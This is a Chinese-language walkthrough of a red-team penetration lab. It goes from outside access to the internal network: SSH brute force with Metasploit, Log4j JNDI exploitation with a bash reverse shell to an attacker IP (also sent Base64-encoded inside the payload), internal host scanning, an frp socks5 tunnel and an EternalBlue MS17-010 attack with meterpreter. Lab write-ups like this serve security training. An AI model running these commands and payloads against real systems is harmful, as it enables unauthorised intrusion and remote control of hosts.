渗透攻击红队域渗透靶场-2（redteam.lab）

外网打点

靶场的服务机是ubuntu，ifconfig拿到IP渗透

直接访问发现没有服务，上nmap扫一波

nmap -A 192.168.123.58 -p-

发现有两端口开着

22端口的ssh和38080的http服务

ssh端口弱口令爆破

既然开了就得试试

使用msf爆破

使用模板     use auxiliary/scanner/ssh/ssh_login  

设置靶机地址     set rhosts ip

设置用户名     set username test

设置字典路径     set pass_file

设置爆破线程     set threads 5

查看设置完成后的效果     show options

不过本靶场考点在38080端口的log4j

复现log4j

payload

1	`${jndi:ldap://IP地址}`

先用dnslog打一下

但是打了半天没返回，才发现是ubuntu没通外网

那直接尝试弹shell

使用JNDI利用工具

1	`java -jar JNDIExploit-1.3-SNAPSHOT-2.jar -i local_ip_address(vps地址)`

这里使用kali攻击，直接用kali的ip即可

开启监听

再用命令反弹

1
2
3

/bin/bash -i >& /dev/tcp/192.168.123.66/9999 0>&1  -反弹shell

payload=${jndi:ldap://vpsip:1389/TomcatBypass/Command/Base64/L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTIzLjY2Lzk5OTk=}

需要用post传参把payload传过去

成功拿到flag1和账号密码后面可以直接用ssh连接

接下来就是内网部分了

内网渗透

先执行ip add看看情况

发现两块网卡，ens33是外网网卡，nes38是内网网卡。那么确定存在内网，下一把进行内网信息收集

先换到ssh，这样方便执行命令和上传文件

在实际渗透中，拿不到ssh就需要搭建ftp/http服务完成上传了

内网信息收集

方法一

执行命令，这样很方便

1	`for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i Find the target; fi; done`

当找到目标之后，可以配合msf进行漏洞扫描等操作

方法二

上传信息收集软件，虽然这样麻烦点，但是信息收集更加广更加深

这里选择工具scan info https://github.com/redtoolskobe/scaninfo

直接通过ssh工具上传

执行命令

1 2	`chmod 777 ./scaninfo_linux_x64 ./scaninfo_linux_x64 -i 10.0.1.1/24`

扫描到主机10.0.1.7 存在MS17-010漏洞

接下来配合msf完成漏洞利用

由于目标在内网需要先进行内网穿透，把流量代理出来

内网穿透

工具 frp

frps.ini 配置

[common]
bind_addr = 0.0.0.0        # 设置监听的ip ，一般是你的外网ip，0.0.0.0表示都监听
bind_port = 8000           # 监听的端口，等待客户端连接 
dashboard_addr = 0.0.0.0   # frp网站服务器的ip，可以访问登录
dashboard_port = 7600       # frp网站服务器的端口，可以访问登录
dashboard_user = root       # frp网站服务账号
dashboard_pwd  = 123456    # frp网站服务密码
token = 1q2w3e             # 客户端的连接密码
heartbeat_timeout = 90     # 连接超时的时间
max_pool_count = 5		   # 允许连接的客户端数量

frpc.ini 配置

[common]
tls_enable = true
server_addr = *.*.*.*         # vps 服务器地址 
server_port = 8000          # vps服务器监听地址
token = 1q2w3e              # 设置的密码 ，设置完流量加密，不好解。      
pool_count = 5            # 将提前建立连接，默认值为 0
protocol = tcp              # 通信方式
health_check_type = tcp    # frpc 将连接本地服务的端口以检测其健康状态
health_check_interval_s = 100   # 健康检查时间间隔
[proxies]
remote_port = 6000  # 把流量转发到vps 那个端口 ，这个是重点等下会用到
plugin = socks5        #plugin 表示为插件 
use_encryption = true   
use_compression = true

分别在服务端执行

1	`./frps -c frps.ini`

客户端

1	`./frpc -c frpc.ini`

接下来配置msf,让msf可以在内网扫描

1 2	`setg Proxies socks5:127.0.0.1:6000 set ReverseAllowProxy true`

完成配置

就行了尝试使用msf扫描10.0.1.7是否存在 msf17-010

search msf17-010
use auxiliary/scanner/smb/smb_ms17_010  # 选择扫描模块
show options  # 查看模块配置
set rhost 10.0.1.7 # 选择攻击ip
run

成功连接到目标机扫描漏洞，说明之前的代理生效了

就行了直接使用msf进行攻击

search msf17-010
use exploit/windows/smb/ms17_010_eternalblue  # 结果测试，这个工具链的成功率会比较大
show options   #查看配置
set payload windows/x64/meterpreter/bind_tcp     
# 设置正向连接，因为目标在内网，所以需要设置成正向连接目标主机才能执行成功。
set  rhost 10.0.1.7
run